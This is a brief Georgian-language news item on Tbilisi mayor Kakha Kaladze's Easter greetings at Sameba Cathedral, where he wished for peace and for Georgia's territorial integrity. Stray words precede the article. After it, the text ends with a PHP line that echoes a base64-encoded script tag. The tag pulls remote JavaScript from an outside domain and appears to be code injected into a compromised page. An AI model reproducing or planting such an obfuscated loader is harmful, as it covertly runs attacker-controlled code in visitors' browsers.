celsiusi
ავერსი შნაიდერი

სრულიად საქართველოს ვულოცავ აღდგომის ბრწყინვალე დღესასწაულს, რომელიც არის ბოროტებაზე სიკეთის გამარჯვების დღესასწაული, – ამის შესახებ თბილისის მერმა, კახა კალაძემ სამების საკათედრო ტაძარში ჟურნალისტებს განუცხადა.

კახა კალაძემ საქართველოს ტერიტორიული მთლიანობის აღდგენა, მშვიდობა უსურვა და აღნიშნა, რომ მშვიდობის გარეშე ყველაფერს ფასი ეკარგება.

„ყველას, სრულიად საქართველოს ვულოცავ აღდგომის ბრწყინვალე დღესასწაულს. ძალიან მნიშვნელოვანი დღესასწაულია. დღესასწაული, რომელიც სიკვდილზე – სიცოცხლის, ბოროტებაზე სიკეთის გამარჯვების დღესასწაულია. ვუერთდები იმ საყოველთაო სიხარულს, რასაც ქრისტიანული სამყარო უფლის აღდგომით განიცდის. მინდა, ჩემს ქვეყანას ვუსურვო ტერიტორიული მთლიანობის აღდგენა, მშვიდობა, რაც ძალიან მნიშვნელოვანია და ამას პატრიარქის ეპისტოლეშიც გაესვა ხაზი. მშვიდობის გარეშე ყველაფერს ფასი ეკარგება, ამიტომ მშვიდობა საქართველოს და მშვიდობა მსოფლიოს. გილოცავთ, ქრისტე აღდგა“, – განაცხადა კახა კალაძემ.

საქართველოს მართლმადიდებელი ეკლესია აღდგომის ბრწყინვალე დღესასწაულს აღნიშნავს. სააღდგომო ლიტურგია მიმდინარეობს თბილისში, სამების საკათედრო ტაძარში, სადაც შეკრებილ მრევლს პატრიარქის სააღდგომო პისტოლე გააცნეს. სამების ტაძარში მიიტანეს იერუსალიმიდან ჩარტერული რეისით ჩამოტანილი წმინდა ცეცხლი.

სამების საკათედრო ტაძარში იმყოფებიან საქართველოს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი და მთავრობის წევრები, „ქართული ოცნების“ თავმჯდომარე ირაკლი კობახიძე, ასევე თბილისის მერი კახა კალაძე.

263
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");